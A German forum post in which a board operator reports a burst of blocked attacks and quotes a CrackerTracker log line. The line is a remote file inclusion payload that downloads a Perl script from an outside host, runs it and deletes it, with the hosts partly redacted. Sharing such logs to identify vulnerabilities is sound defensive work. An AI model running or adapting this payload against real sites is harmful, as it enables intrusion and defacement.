Heute morgen in der Zeit von 6 bis 12 Uhr wurde mein Board mit 100 Angriffen derselben Art von derselben IP-Adresse angegriffen.
(Bisher hatte ich gerade mal ~60 abgewehrte SPAM-Anmeldungen und ~10 abgewehrte Angriffsversuche mit chr(...), daher war ich heute mittag sehr überrascht, als der Counter plötzlich 100 Angriffe mehr anzeigte.)
Ich habe keine Ahnung, welche alte oder neue Sicherheitslücke er damit ausnutzen wollte, jedoch hat der CBACK CrackerTracker alles abgewehrt.
Jetzt würde mich natürlich interessieren, ob es sich hier um eine neue Lücke handeln könnte.
Hier mal ein Auszug aus der Wurm & Exploit Logdatei des CrackerTrackers:
Edit cYbercOsmOnauT: Links mit Defacementscripten entfernt217.69.231.27 hat geschrieben:c=http://--IP gelöscht--/x/tool25.txt?&cmd=cd%20/tmp/;GET%20http://home.arcor.de/--HP gelöscht--/xi.txt;perl%20xi.txt;rm%20-rf%20xi.txt*?